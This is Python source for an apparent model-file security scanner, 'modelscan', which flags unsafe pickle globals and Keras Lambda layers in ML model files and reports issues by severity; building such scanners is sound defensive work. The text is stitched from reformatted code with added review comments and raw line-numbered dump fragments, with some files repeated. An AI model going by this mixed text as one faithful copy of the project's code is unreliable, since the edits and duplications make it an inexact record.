    """Error tied to a filesystem path rather than a scanner."""

    path: Path

    def __init__(
        self,
        message: str,
        path: Path,
    ) -> None:
        super().__init__(message)
        self.path = path

    def __str__(self) -> str:
        return f"The following error was raised during scan of file {str(self.path)}: \n{self.message}"

    @staticmethod
    def name() -> str:
        return "PATH"

    def to_dict(self) -> Dict[str, str]:
        return {
            "category": self.name(),
            "description": self.message,
            "source": str(self.path),
        }


class NestedZipError(PathError):
    """Zip archives nested inside zip archives are not supported."""

    @staticmethod
    def name() -> str:
        return "NESTED_ZIP"


class PickleGenopsError(ModelScanScannerError):
    """Failure while disassembling a pickle stream into opcodes."""

    @staticmethod
    def name() -> str:
        return "PICKLE_GENOPS"


class JsonDecodeError(ModelScanScannerError):
    """Model metadata that should be JSON could not be decoded."""

    @staticmethod
    def name() -> str:
        return "JSON_DECODE"
"NESTED_ZIP" 99 | 100 | 101 | class PickleGenopsError(ModelScanScannerError): 102 | @staticmethod 103 | def name() -> str: 104 | return "PICKLE_GENOPS" 105 | 106 | 107 | class JsonDecodeError(ModelScanScannerError): 108 | @staticmethod 109 | def name() -> str: 110 | return "JSON_DECODE" 111 | -------------------------------------------------------------------------------- /modelscan/issues.py: -------------------------------------------------------------------------------- 1 | import abc 2 | import logging 3 | from enum import Enum 4 | from pathlib import Path 5 | from typing import Any, List, Union, Dict, Optional 6 | 7 | from collections import defaultdict 8 | 9 | from modelscan.settings import Property 10 | 11 | logger = logging.getLogger("modelscan") 12 | 13 | 14 | class IssueSeverity(Enum): 15 | LOW = 1 16 | MEDIUM = 2 17 | HIGH = 3 18 | CRITICAL = 4 19 | 20 | 21 | class IssueCode: 22 | UNSAFE_OPERATOR = Property("UNSAFE_OPERATOR", 1) 23 | 24 | 25 | class IssueDetails(metaclass=abc.ABCMeta): 26 | def __init__(self, scanner: str = "") -> None: 27 | self.scanner = scanner 28 | 29 | @abc.abstractmethod 30 | def output_lines(self) -> List[str]: 31 | raise NotImplementedError 32 | 33 | @abc.abstractmethod 34 | def output_json(self) -> Dict[str, str]: 35 | raise NotImplementedError 36 | 37 | 38 | class Issue: 39 | """ 40 | Defines properties of a issue 41 | """ 42 | 43 | def __init__( 44 | self, 45 | code: Property, 46 | severity: IssueSeverity, 47 | details: IssueDetails, 48 | ) -> None: 49 | """ 50 | Create a issue with given information 51 | 52 | :param code: Code of the issue from the issue code class. 53 | :param severity: The severity level of the issue from Severity enum. 54 | :param details: An implementation of the IssueDetails object. 
55 | """ 56 | self.code = code 57 | self.severity = severity 58 | self.details = details 59 | 60 | def __eq__(self, other: Any) -> bool: 61 | if type(other) is not Issue: 62 | return False 63 | return ( 64 | self.code == other.code 65 | and self.severity == other.severity 66 | and self.details.module == other.details.module # type: ignore[attr-defined] 67 | and self.details.operator == other.details.operator # type: ignore[attr-defined] 68 | and str(self.details.source) == str(other.details.source) # type: ignore[attr-defined] 69 | and self.details.severity == other.severity # type: ignore[attr-defined] 70 | ) 71 | 72 | def __repr__(self) -> str: 73 | return str(self.severity) + str(self.details) 74 | 75 | def __hash__(self) -> int: 76 | return hash( 77 | str(self.code) 78 | + str(self.severity) 79 | + str(self.details.module) # type: ignore[attr-defined] 80 | + str(self.details.operator) # type: ignore[attr-defined] 81 | + str(self.details.source) # type: ignore[attr-defined] 82 | + str(self.details.severity) # type: ignore[attr-defined] 83 | ) 84 | 85 | def print(self) -> None: 86 | issue_description = self.code.name 87 | if self.code.value == IssueCode.UNSAFE_OPERATOR.value: 88 | issue_description = "Unsafe operator" 89 | else: 90 | logger.error("No issue description for issue code %s", self.code) 91 | 92 | print(f"\n{issue_description} found:") 93 | print(f" - Severity: {self.severity.name}") 94 | for output_line in self.details.output_lines(): 95 | print(f" - {output_line}") 96 | 97 | 98 | class Issues: 99 | all_issues: List[Issue] 100 | 101 | def __init__(self, issues: Optional[List[Issue]] = None) -> None: 102 | self.all_issues = [] if issues is None else issues 103 | 104 | def add_issue(self, issue: Issue) -> None: 105 | """ 106 | Add a single issue 107 | """ 108 | self.all_issues.append(issue) 109 | 110 | def add_issues(self, issues: List[Issue]) -> None: 111 | """ 112 | Add a list of issues 113 | """ 114 | self.all_issues.extend(issues) 115 | 116 | def 
group_by_severity(self) -> Dict[str, List[Issue]]: 117 | """ 118 | Group issues by severity. 119 | """ 120 | issues: Dict[str, List[Issue]] = defaultdict(list) 121 | for issue in self.all_issues: 122 | issues[issue.severity.name].append(issue) 123 | return issues 124 | 125 | 126 | class OperatorIssueDetails(IssueDetails): 127 | def __init__( 128 | self, 129 | module: str, 130 | operator: str, 131 | severity: IssueSeverity, 132 | source: Union[Path, str], 133 | scanner: str = "", 134 | ) -> None: 135 | super().__init__(scanner) 136 | self.module = module 137 | self.operator = operator 138 | self.source = source 139 | self.severity = severity 140 | self.scanner = scanner 141 | 142 | def output_lines(self) -> List[str]: 143 | return [ 144 | f"Description: Use of unsafe operator '{self.operator}' from module '{self.module}'", 145 | f"Source: {str(self.source)}", 146 | ] 147 | 148 | def output_json(self) -> Dict[str, str]: 149 | return { 150 | "description": f"Use of unsafe operator '{self.operator}' from module '{self.module}'", 151 | "operator": f"{self.operator}", 152 | "module": f"{self.module}", 153 | "source": f"{str(self.source)}", 154 | "scanner": f"{self.scanner}", 155 | "severity": f"{self.severity.name}", 156 | } 157 | 158 | def __repr__(self) -> str: 159 | return f"" 160 | -------------------------------------------------------------------------------- /modelscan/middlewares/__init__.py: -------------------------------------------------------------------------------- 1 | from modelscan.middlewares.format_via_extension import FormatViaExtensionMiddleware 2 | -------------------------------------------------------------------------------- /modelscan/middlewares/format_via_extension.py: -------------------------------------------------------------------------------- 1 | from .middleware import MiddlewareBase 2 | from modelscan.model import Model 3 | from typing import Callable 4 | 5 | 6 | class FormatViaExtensionMiddleware(MiddlewareBase): 7 | def 
class FormatViaExtensionMiddleware(MiddlewareBase):
    """Tag a model with the serialization formats implied by its file
    extension, based on the extension->formats map in settings."""

    def __call__(self, model: Model, call_next: Callable[[Model], None]) -> None:
        extension = model.get_source().suffix
        # Avoid shadowing the builtin `format` with the loop variable.
        matched_formats = [
            file_format
            for file_format, extensions in self._settings["formats"].items()
            if extension in extensions
        ]
        if matched_formats:
            # Bug fix: the original wrote
            #     model.get_context("formats") or [] + formats
            # which, because `+` binds tighter than `or`, parses as
            #     existing or ([] + formats)
            # so whenever the model already carried formats, the newly
            # matched ones were silently dropped. Parenthesize correctly.
            existing = model.get_context("formats") or []
            model.set_context("formats", existing + matched_formats)

        call_next(model)
class ModelDataEmpty(ValueError):
    """Raised when stream access is requested but no stream is open."""

    pass


class Model:
    """A model artifact: a source path plus an optional open byte stream.

    Streams passed in by the caller are caller-owned and never closed here;
    streams opened internally via open() are closed by close().
    """

    _source: Path
    _stream: Optional[IO[bytes]]
    _should_close_stream: bool  # True only when we opened the stream ourselves
    _context: Dict[str, Any]  # arbitrary per-model metadata (e.g. "formats")

    def __init__(self, source: Union[str, Path], stream: Optional[IO[bytes]] = None):
        self._source = Path(source)
        self._stream = stream
        # Ownership rule: close only what we ourselves open.
        self._should_close_stream = stream is None
        self._context = {"formats": []}

    def set_context(self, key: str, value: Any) -> None:
        """Attach a metadata value under the given key."""
        self._context[key] = value

    def get_context(self, key: str) -> Any:
        """Return the metadata value for key, or None if unset."""
        return self._context.get(key)

    def open(self) -> "Model":
        """Open the source file for reading if no stream is attached yet."""
        if self._stream is None:
            self._stream = open(self._source, "rb")
            self._should_close_stream = True
        return self

    def close(self) -> None:
        """Close the stream, but only if this object opened it."""
        if self._stream is not None and self._should_close_stream:
            self._stream.close()
            self._stream = None  # guard against double-close
            self._should_close_stream = False

    def __enter__(self) -> "Model":
        return self.open()

    def __exit__(self, exc_type, exc_value, traceback) -> None:  # type: ignore
        self.close()

    def get_source(self) -> Path:
        """Path of the model file this object represents."""
        return self._source

    def get_stream(self, offset: int = 0) -> IO[bytes]:
        """Return the open stream positioned at `offset`.

        :raises ModelDataEmpty: if no stream is open.
        """
        if self._stream is None:
            raise ModelDataEmpty("Model data is empty.")
        self._stream.seek(offset)
        return self._stream
self._init_errors.append(ModelScanError(f"Error loading middlewares: {e}")) 56 | 57 | def _load_scanners(self) -> None: 58 | for scanner_path, scanner_settings in self._settings["scanners"].items(): 59 | if ( 60 | "enabled" in scanner_settings.keys() 61 | and self._settings["scanners"][scanner_path]["enabled"] 62 | ): 63 | try: 64 | (modulename, classname) = scanner_path.rsplit(".", 1) 65 | imported_module = importlib.import_module( 66 | name=modulename, package=classname 67 | ) 68 | 69 | scanner_class: ScanBase = getattr(imported_module, classname) 70 | self._scanners_to_run.append(scanner_class) 71 | 72 | except Exception as e: 73 | logger.error("Error importing scanner %s", scanner_path) 74 | self._init_errors.append( 75 | ModelScanError( 76 | f"Error importing scanner {scanner_path}: {e}", 77 | ) 78 | ) 79 | 80 | def _iterate_models(self, model_path: Path) -> Generator[Model, None, None]: 81 | if not model_path.exists(): 82 | logger.error("Path %s does not exist", model_path) 83 | self._errors.append(PathError("Path is not valid", model_path)) 84 | 85 | files = [model_path] 86 | if model_path.is_dir(): 87 | logger.debug("Path %s is a directory", str(model_path)) 88 | files = [f for f in model_path.rglob("*") if Path.is_file(f)] 89 | 90 | for file in files: 91 | with Model(file) as model: 92 | yield model 93 | 94 | if not _is_zipfile(file, model.get_stream()): 95 | continue 96 | 97 | try: 98 | with zipfile.ZipFile(model.get_stream(), "r") as zip: 99 | file_names = zip.namelist() 100 | for file_name in file_names: 101 | with zip.open(file_name, "r") as file_io: 102 | file_name = f"{model.get_source()}:{file_name}" 103 | if _is_zipfile(file_name, data=file_io): 104 | self._errors.append( 105 | NestedZipError( 106 | "ModelScan does not support nested zip files.", 107 | Path(file_name), 108 | ) 109 | ) 110 | continue 111 | 112 | yield Model(file_name, file_io) 113 | except (zipfile.BadZipFile, RuntimeError) as e: 114 | logger.debug( 115 | "Skipping zip file %s, due 
to error", 116 | str(model.get_source()), 117 | exc_info=True, 118 | ) 119 | self._skipped.append( 120 | ModelScanSkipped( 121 | "ModelScan", 122 | SkipCategories.BAD_ZIP, 123 | f"Skipping zip file due to error: {e}", 124 | str(model.get_source()), 125 | ) 126 | ) 127 | 128 | def scan( 129 | self, 130 | path: Union[str, Path], 131 | ) -> Dict[str, Any]: 132 | self._issues = Issues() 133 | self._errors = [] 134 | self._errors.extend(self._init_errors) 135 | self._skipped = [] 136 | self._scanned = [] 137 | self._input_path = str(path) 138 | pathlib_path = Path().cwd() if path == "." else Path(path).absolute() 139 | model_path = Path(pathlib_path) 140 | 141 | all_paths: List[Path] = [] 142 | for model in self._iterate_models(model_path): 143 | self._middleware_pipeline.run(model) 144 | self._scan_source(model) 145 | all_paths.append(model.get_source()) 146 | 147 | if self._skipped: 148 | all_skipped_paths = [skipped.source for skipped in self._skipped] 149 | for path in all_paths: 150 | main_file_path = str(path).split(":")[0] 151 | 152 | if main_file_path == str(path): 153 | continue 154 | 155 | # If main container is skipped, we only add its content to skipped but not the file itself 156 | if main_file_path in all_skipped_paths: 157 | self._skipped = [ 158 | item for item in self._skipped if item.source != main_file_path 159 | ] 160 | 161 | continue 162 | 163 | return self._generate_results() 164 | 165 | def _scan_source( 166 | self, 167 | model: Model, 168 | ) -> bool: 169 | scanned = False 170 | for scan_class in self._scanners_to_run: 171 | scanner = scan_class(self._settings) # type: ignore[operator] 172 | 173 | try: 174 | scan_results = scanner.scan(model) 175 | except Exception as e: 176 | logger.error( 177 | "Error encountered from scanner %s with path %s: %s", 178 | scanner.full_name(), 179 | str(model.get_source()), 180 | e, 181 | ) 182 | self._errors.append( 183 | ModelScanScannerError( 184 | scanner.full_name(), 185 | str(e), 186 | model, 187 | ) 188 | ) 
189 | continue 190 | 191 | if scan_results is not None: 192 | scanned = True 193 | logger.info( 194 | "Scanning %s using %s model scan", 195 | model.get_source(), 196 | scanner.full_name(), 197 | ) 198 | if scan_results.errors: 199 | self._errors.extend(scan_results.errors) 200 | elif scan_results.issues: 201 | self._scanned.append(str(model.get_source())) 202 | self._issues.add_issues(scan_results.issues) 203 | 204 | elif scan_results.skipped: 205 | self._skipped.extend(scan_results.skipped) 206 | else: 207 | self._scanned.append(str(model.get_source())) 208 | 209 | if not scanned: 210 | all_skipped_files = [skipped.source for skipped in self._skipped] 211 | if str(model.get_source()) not in all_skipped_files: 212 | self._skipped.append( 213 | ModelScanSkipped( 214 | "ModelScan", 215 | SkipCategories.SCAN_NOT_SUPPORTED, 216 | "Model Scan did not scan file", 217 | str(model.get_source()), 218 | ) 219 | ) 220 | 221 | return scanned 222 | 223 | def _generate_results(self) -> Dict[str, Any]: 224 | report: Dict[str, Any] = {} 225 | 226 | absolute_path = Path(self._input_path).absolute() 227 | if Path(self._input_path).is_file(): 228 | absolute_path = Path(absolute_path).parent 229 | 230 | issues_by_severity = self._issues.group_by_severity() 231 | total_issue_count = len(self._issues.all_issues) 232 | 233 | report["summary"] = {"total_issues_by_severity": {}} 234 | for severity in IssueSeverity: 235 | if severity.name in issues_by_severity: 236 | report["summary"]["total_issues_by_severity"][severity.name] = len( 237 | issues_by_severity[severity.name] 238 | ) 239 | else: 240 | report["summary"]["total_issues_by_severity"][severity.name] = 0 241 | 242 | report["summary"]["total_issues"] = total_issue_count 243 | report["summary"]["input_path"] = str(self._input_path) 244 | report["summary"]["absolute_path"] = str(absolute_path) 245 | report["summary"]["modelscan_version"] = __version__ 246 | report["summary"]["timestamp"] = datetime.now().isoformat() 247 | 248 | 
report["summary"]["scanned"] = {"total_scanned": len(self._scanned)} 249 | 250 | if self._scanned: 251 | scanned_files = [] 252 | for file_name in self._scanned: 253 | scanned_files.append( 254 | str(Path(file_name).relative_to(Path(absolute_path))) 255 | ) 256 | 257 | report["summary"]["scanned"]["scanned_files"] = scanned_files 258 | 259 | if self._issues.all_issues: 260 | report["issues"] = [ 261 | issue.details.output_json() for issue in self._issues.all_issues 262 | ] 263 | 264 | for issue in report["issues"]: 265 | issue["source"] = str( 266 | Path(issue["source"]).relative_to(Path(absolute_path)) 267 | ) 268 | else: 269 | report["issues"] = [] 270 | 271 | all_errors = [] 272 | if self._errors: 273 | for error in self._errors: 274 | error_information = error.to_dict() 275 | if "source" in error_information: 276 | error_information["source"] = str( 277 | Path(error_information["source"]).relative_to( 278 | Path(absolute_path) 279 | ) 280 | ) 281 | 282 | all_errors.append(error_information) 283 | 284 | report["errors"] = all_errors 285 | 286 | report["summary"]["skipped"] = {"total_skipped": len(self._skipped)} 287 | 288 | all_skipped_files = [] 289 | if self._skipped: 290 | for skipped_file in self._skipped: 291 | skipped_file_information = {} 292 | skipped_file_information["category"] = str(skipped_file.category.name) 293 | skipped_file_information["description"] = str(skipped_file.message) 294 | skipped_file_information["source"] = str( 295 | Path(skipped_file.source).relative_to(Path(absolute_path)) 296 | ) 297 | all_skipped_files.append(skipped_file_information) 298 | 299 | report["summary"]["skipped"]["skipped_files"] = all_skipped_files 300 | 301 | return report 302 | 303 | def is_compatible(self, path: str) -> bool: 304 | # Determines whether a file path is compatible with any of the available scanners 305 | if Path(path).suffix in self._settings["supported_zip_extensions"]: 306 | return True 307 | for scanner_path, scanner_settings in 
self._settings["scanners"].items(): 308 | if ( 309 | "supported_extensions" in scanner_settings.keys() 310 | and Path(path).suffix 311 | in self._settings["scanners"][scanner_path]["supported_extensions"] 312 | ): 313 | return True 314 | 315 | return False 316 | 317 | def generate_report(self) -> Optional[str]: 318 | reporting_module = self._settings["reporting"]["module"] 319 | report_settings = self._settings["reporting"]["settings"] 320 | 321 | scan_report = None 322 | try: 323 | (modulename, classname) = reporting_module.rsplit(".", 1) 324 | imported_module = importlib.import_module( 325 | name=modulename, package=classname 326 | ) 327 | 328 | report_class = getattr(imported_module, classname) 329 | scan_report = report_class.generate(scan=self, settings=report_settings) 330 | 331 | except Exception as e: 332 | logger.error("Error generating report using %s: %s", reporting_module, e) 333 | self._errors.append( 334 | ModelScanError(f"Error generating report using {reporting_module}: {e}") 335 | ) 336 | 337 | return scan_report 338 | 339 | @property 340 | def issues(self) -> Issues: 341 | return self._issues 342 | 343 | @property 344 | def errors(self) -> List[ErrorBase]: 345 | return self._errors 346 | 347 | @property 348 | def scanned(self) -> List[str]: 349 | return self._scanned 350 | 351 | @property 352 | def skipped(self) -> List[ModelScanSkipped]: 353 | return self._skipped 354 | -------------------------------------------------------------------------------- /modelscan/reports.py: -------------------------------------------------------------------------------- 1 | import abc 2 | import logging 3 | import json 4 | from typing import Optional, Dict, Any 5 | 6 | from rich import print 7 | 8 | from modelscan.modelscan import ModelScan 9 | from modelscan.issues import IssueSeverity 10 | 11 | logger = logging.getLogger("modelscan") 12 | 13 | 14 | class Report(metaclass=abc.ABCMeta): 15 | """ 16 | Abstract base class for different reporting modules. 
class Report(metaclass=abc.ABCMeta):
    """
    Abstract base class for different reporting modules.
    """

    def __init__(self) -> None:
        pass

    @staticmethod
    def generate(
        scan: ModelScan,
        settings: Dict[str, Any] = {},
    ) -> Optional[str]:
        """
        Generate a report for the given scan.
        Derived classes must provide an implementation of this method.

        :param scan: Completed ModelScan holding issues, errors and skips.
        :param settings: Reporter-specific settings (e.g. ``show_skipped``).
        """
        raise NotImplementedError


class ConsoleReport(Report):
    """Human-readable summary printed to stdout using rich markup."""

    @staticmethod
    def generate(
        scan: ModelScan,
        settings: Dict[str, Any] = {},
    ) -> None:
        issues_by_severity = scan.issues.group_by_severity()
        print("\n[blue]--- Summary ---")
        total_issue_count = len(scan.issues.all_issues)
        if total_issue_count > 0:
            print(f"\nTotal Issues: {total_issue_count}")
            print("\nTotal Issues By Severity:\n")
            for severity in IssueSeverity:
                if severity.name in issues_by_severity:
                    print(
                        f" - {severity.name}: {len(issues_by_severity[severity.name])}"
                    )
                else:
                    print(f" - {severity.name}: [green]0")

            print("\n[blue]--- Issues by Severity ---")
            for issue_keys in issues_by_severity.keys():
                print(f"\n[blue]--- {issue_keys} ---")
                for issue in issues_by_severity[issue_keys]:
                    issue.print()
        else:
            print("\n[green] No issues found! 🎉")

        if len(scan.errors) > 0:
            print("\n[red]--- Errors --- ")
            for index, error in enumerate(scan.errors):
                print(f"\nError {index+1}:")
                print(str(error))

        if len(scan.skipped) > 0:
            print("\n[blue]--- Skipped --- ")
            print(
                f"\nTotal skipped: {len(scan.skipped)} - run with --show-skipped to see the full list."
            )
            # Fix: use .get() — the default reporting settings are an empty
            # dict, so direct indexing raised KeyError whenever anything was
            # skipped. This also matches JSONReport's behavior below.
            if settings.get("show_skipped"):
                print("\nSkipped files list:\n")
                for file_name in scan.skipped:
                    print(str(file_name))


class JSONReport(Report):
    """Machine-readable report: JSON to stdout and optionally to a file."""

    @staticmethod
    def generate(
        scan: ModelScan,
        settings: Dict[str, Any] = {},
    ) -> None:
        report: Dict[str, Any] = scan._generate_results()
        # Skipped entries are omitted unless explicitly requested.
        if not settings.get("show_skipped"):
            del report["summary"]["skipped"]

        print(json.dumps(report))

        # Optionally persist the same payload to disk.
        output = settings.get("output_file")
        if output:
            with open(output, "w") as outfile:
                json.dump(report, outfile)
class H5LambdaDetectScan(SavedModelLambdaDetectScan):
    """Detects Keras ``Lambda`` layers inside HDF5 (``.h5``) model files.

    A ``Lambda`` layer carries an arbitrary serialized python function, so its
    presence is reported as an unsafe operator. Severity comes from the
    ``unsafe_keras_operators`` settings shared with SavedModelLambdaDetectScan.
    """

    def scan(
        self,
        model: Model,
    ) -> Optional[ScanResults]:
        """Scan ``model`` if it was tagged as Keras-H5 format, else return None."""
        # Only handle models the middleware tagged as Keras-H5 format.
        if SupportedModelFormats.KERAS_H5.value not in [
            format_property.value for format_property in model.get_context("formats")
        ]:
            return None

        # h5py is an optional extra; surface an install hint instead of crashing.
        dep_error = self.handle_binary_dependencies()
        if dep_error:
            return ScanResults(
                [],
                [
                    DependencyError(
                        self.name(),
                        f"To use {self.full_name()}, please install modelscan with h5py extras. `pip install 'modelscan[ h5py ]'` if you are using pip.",
                        model,
                    )
                ],
                [],
            )

        results = self._scan_keras_h5_file(model)
        if results:
            return self.label_results(results)

        return None

    def _scan_keras_h5_file(self, model: Model) -> Optional[ScanResults]:
        """Inspect the HDF5 ``model_config`` attribute for Lambda layers.

        Returns a JsonDecodeError result when the config is not valid JSON, a
        skip result when no config is present, and None when operator
        extraction itself returned None.
        """
        machine_learning_library_name = "Keras"
        if self._check_model_config(model):
            operators_in_model = self._get_keras_h5_operator_names(model)
            if operators_in_model is None:
                return None

            # Sentinel emitted by _get_keras_h5_operator_names on parse failure.
            if "JSONDecodeError" in operators_in_model:
                return ScanResults(
                    [],
                    [
                        JsonDecodeError(
                            self.name(),
                            "Not a valid JSON data",
                            model,
                        )
                    ],
                    [],
                )
            return H5LambdaDetectScan._check_for_unsafe_tf_keras_operator(
                module_name=machine_learning_library_name,
                raw_operator=operators_in_model,
                model=model,
                # Severity table is shared with the SavedModel lambda scanner.
                unsafe_operators=self._settings["scanners"][
                    SavedModelLambdaDetectScan.full_name()
                ]["unsafe_keras_operators"],
            )
        else:
            return ScanResults(
                [],
                [],
                [
                    ModelScanSkipped(
                        self.name(),
                        SkipCategories.MODEL_CONFIG,
                        "Model Config not found",
                        str(model.get_source()),
                    )
                ],
            )

    def _check_model_config(self, model: Model) -> bool:
        """Return True when the HDF5 file carries a ``model_config`` attribute."""
        with h5py.File(model.get_stream()) as model_hdf5:
            if "model_config" in model_hdf5.attrs.keys():
                return True
            else:
                logger.error(f"Model Config not found in: {model.get_source()}")
                return False

    def _get_keras_h5_operator_names(self, model: Model) -> Optional[List[Any]]:
        """Return one "Lambda" marker per Lambda layer in the model config.

        Returns ``["JSONDecodeError"]`` when the config is not valid JSON,
        ``None`` when no config attribute exists, ``[]`` when there are no
        Lambda layers.
        """
        # Todo: source isn't guaranteed to be a file
        # NOTE(review): this re-opens the stream already consumed by
        # _check_model_config; assumes model.get_stream() is re-readable for
        # non-file sources — TODO confirm.

        with h5py.File(model.get_stream()) as model_hdf5:
            try:
                if "model_config" not in model_hdf5.attrs.keys():
                    return None

                model_config = json.loads(model_hdf5.attrs.get("model_config", {}))
                layers = model_config.get("config", {}).get("layers", {})
                lambda_layers = []
                for layer in layers:
                    if layer.get("class_name", {}) == "Lambda":
                        lambda_layers.append(
                            layer.get("config", {}).get("function", {})
                        )
            except json.JSONDecodeError as e:
                logger.error(
                    f"Not a valid JSON data from source: {model.get_source()}, error: {e}"
                )
                # Sentinel consumed by _scan_keras_h5_file.
                return ["JSONDecodeError"]

            if lambda_layers:
                # Only the presence of Lambda layers is reported; payloads
                # are not decoded.
                return ["Lambda"] * len(lambda_layers)

        return []

    def handle_binary_dependencies(
        self, settings: Optional[Dict[str, Any]] = None
    ) -> Optional[str]:
        # Returns an error name when h5py is missing, None when scanning can run.
        if not h5py_installed:
            return DependencyError.name()
        return None

    @staticmethod
    def name() -> str:
        return "hdf5"

    @staticmethod
    def full_name() -> str:
        return "modelscan.scanners.H5LambdaDetectScan"
class KerasLambdaDetectScan(SavedModelLambdaDetectScan):
    """Detects Keras ``Lambda`` layers inside ``.keras`` (zip) archives.

    A ``.keras`` file is a zip archive whose ``config.json`` describes the
    model topology; ``Lambda`` layers embed arbitrary serialized python and
    are therefore flagged as unsafe operators.
    """

    def scan(self, model: Model) -> Optional[ScanResults]:
        """Scan ``model`` if it was tagged as Keras format, else return None."""
        if SupportedModelFormats.KERAS.value not in [
            format_property.value for format_property in model.get_context("formats")
        ]:
            return None

        # tensorflow is an optional extra; surface an install hint instead of crashing.
        dep_error = self.handle_binary_dependencies()
        if dep_error:
            return ScanResults(
                [],
                [
                    DependencyError(
                        self.name(),
                        f"To use {self.full_name()}, please install modelscan with tensorflow extras. `pip install 'modelscan[ tensorflow ]'` if you are using pip.",
                        model,
                    )
                ],
                [],
            )

        file_name = ""  # last archive member seen; "" until the loop runs
        try:
            with zipfile.ZipFile(model.get_stream(), "r") as zip:
                file_names = zip.namelist()
                for file_name in file_names:
                    if file_name == "config.json":
                        with zip.open(file_name, "r") as config_file:
                            # Fix: do not rebind the `model` parameter — the
                            # fallback error below must reference the archive.
                            config_model = Model(
                                f"{model.get_source()}:{file_name}", config_file
                            )
                            return self.label_results(
                                self._scan_keras_config_file(config_model)
                            )
        except zipfile.BadZipFile as e:
            # Bug fix: `file_name` used to be referenced unconditionally here,
            # raising UnboundLocalError when ZipFile() itself rejected the
            # archive (i.e. before the loop ever ran).
            bad_source = (
                f"{model.get_source()}:{file_name}"
                if file_name
                else str(model.get_source())
            )
            return ScanResults(
                [],
                [],
                [
                    ModelScanSkipped(
                        self.name(),
                        SkipCategories.BAD_ZIP,
                        f"Skipping zip file due to error: {e}",
                        bad_source,
                    )
                ],
            )

        # Archive opened fine but contained no config.json to scan.
        # Added return to pass the failing mypy test: Missing return statement
        return ScanResults(
            [],
            [
                ModelScanScannerError(
                    self.name(),
                    "Unable to scan .keras file",  # Not sure if this is a representative message for ModelScanError
                    model,
                )
            ],
            [],
        )

    def _scan_keras_config_file(self, model: Model) -> ScanResults:
        """Parse ``config.json`` and flag any Lambda layers it declares."""
        machine_learning_library_name = "Keras"

        try:
            operators_in_model = self._get_keras_operator_names(model)
        except json.JSONDecodeError as e:
            logger.error(
                f"Not a valid JSON data from source: {model.get_source()}, error: {e}"
            )

            return ScanResults(
                [],
                [
                    JsonDecodeError(
                        self.name(),
                        "Not a valid JSON data",
                        model,
                    )
                ],
                [],
            )

        if operators_in_model:
            return KerasLambdaDetectScan._check_for_unsafe_tf_keras_operator(
                module_name=machine_learning_library_name,
                raw_operator=operators_in_model,
                model=model,
                # Severity table shared with the SavedModel lambda scanner.
                unsafe_operators=self._settings["scanners"][
                    SavedModelLambdaDetectScan.full_name()
                ]["unsafe_keras_operators"],
            )

        else:
            return ScanResults(
                [],
                [],
                [],
            )

    def _get_keras_operator_names(self, model: Model) -> List[str]:
        """Return one "Lambda" marker per Lambda layer in the JSON config.

        Raises json.JSONDecodeError when the stream is not valid JSON.
        """
        model_config_data = json.load(model.get_stream())

        lambda_layers = [
            layer.get("config", {}).get("function", {})
            for layer in model_config_data.get("config", {}).get("layers", {})
            if layer.get("class_name", {}) == "Lambda"
        ]
        if lambda_layers:
            return ["Lambda"] * len(lambda_layers)

        return []

    @staticmethod
    def name() -> str:
        return "keras"

    @staticmethod
    def full_name() -> str:
        return "modelscan.scanners.KerasLambdaDetectScan"
class NumpyUnsafeOpScan(ScanBase):
    """Scans numpy ``.npy`` payloads for unsafe pickle globals."""

    def scan(
        self,
        model: Model,
    ) -> Optional[ScanResults]:
        """Run the numpy pickle scan when the model is tagged as numpy format."""
        detected_formats = {
            format_property.value for format_property in model.get_context("formats")
        }
        if SupportedModelFormats.NUMPY.value not in detected_formats:
            return None

        return self.label_results(
            scan_numpy(
                model=model,
                settings=self._settings,
            )
        )

    @staticmethod
    def name() -> str:
        return "numpy"

    @staticmethod
    def full_name() -> str:
        return "modelscan.scanners.NumpyUnsafeOpScan"


class PickleUnsafeOpScan(ScanBase):
    """Scans raw pickle streams for unsafe globals."""

    def scan(
        self,
        model: Model,
    ) -> Optional[ScanResults]:
        """Run the pickle-bytes scan when the model is tagged as pickle format."""
        detected_formats = {
            format_property.value for format_property in model.get_context("formats")
        }
        if SupportedModelFormats.PICKLE.value not in detected_formats:
            return None

        return self.label_results(
            scan_pickle_bytes(
                model=model,
                settings=self._settings,
            )
        )

    @staticmethod
    def name() -> str:
        return "pickle"

    @staticmethod
    def full_name() -> str:
        return "modelscan.scanners.PickleUnsafeOpScan"
class SavedModelScan(ScanBase):
    """Base scanner for TensorFlow SavedModel protobufs (``.pb`` files).

    Handles format gating, the optional tensorflow dependency, and result
    labelling; subclasses implement ``_scan`` for the concrete artifact
    (``keras_metadata.pb`` vs. the graph-def protobuf).
    """

    def scan(
        self,
        model: Model,
    ) -> Optional[ScanResults]:
        """Scan ``model`` if it was tagged as tensorflow format, else return None."""
        if SupportedModelFormats.TENSORFLOW.value not in [
            format_property.value for format_property in model.get_context("formats")
        ]:
            return None

        # tensorflow is an optional extra; surface an install hint instead of crashing.
        dep_error = self.handle_binary_dependencies()
        if dep_error:
            return ScanResults(
                [],
                [
                    DependencyError(
                        self.name(),
                        f"To use {self.full_name()}, please install modelscan with tensorflow extras. `pip install 'modelscan[ tensorflow ]'` if you are using pip.",
                        model,
                    )
                ],
                [],
            )

        results = self._scan(model)

        return self.label_results(results) if results else None

    def _scan(self, model: Model) -> Optional[ScanResults]:
        # Subclass hook: perform the format-specific scan.
        raise NotImplementedError

    # This function checks for malicious operators in both Keras and Tensorflow
    @staticmethod
    def _check_for_unsafe_tf_keras_operator(
        module_name: str,
        raw_operator: List[str],
        model: Model,
        unsafe_operators: Dict[str, Any],
    ) -> ScanResults:
        """Map raw operator names onto issues.

        Severity resolution per operator:
          1. explicitly listed in ``unsafe_operators`` -> configured severity;
          2. not among tensorflow's known raw ops -> MEDIUM (unknown op);
          3. otherwise treated as safe and skipped.

        NOTE(review): when tensorflow is not installed ``all_operators`` is
        empty, so every operator not explicitly configured falls into the
        MEDIUM bucket — confirm this is the intended degraded behavior.
        """
        issues: List[Issue] = []
        all_operators = (
            tensorflow.raw_ops.__dict__.keys() if tensorflow_installed else []
        )
        # Underscore-prefixed entries are private attributes, not real ops.
        all_safe_operators = [
            operator for operator in list(all_operators) if operator[0] != "_"
        ]

        for op in raw_operator:
            if op in unsafe_operators:
                severity = IssueSeverity[unsafe_operators[op]]
            elif op not in all_safe_operators:
                severity = IssueSeverity.MEDIUM
            else:
                continue

            issues.append(
                Issue(
                    code=IssueCode.UNSAFE_OPERATOR,
                    severity=severity,
                    details=OperatorIssueDetails(
                        module=module_name,
                        operator=op,
                        source=str(model.get_source()),
                        severity=severity,
                    ),
                )
            )
        return ScanResults(issues, [], [])

    def handle_binary_dependencies(
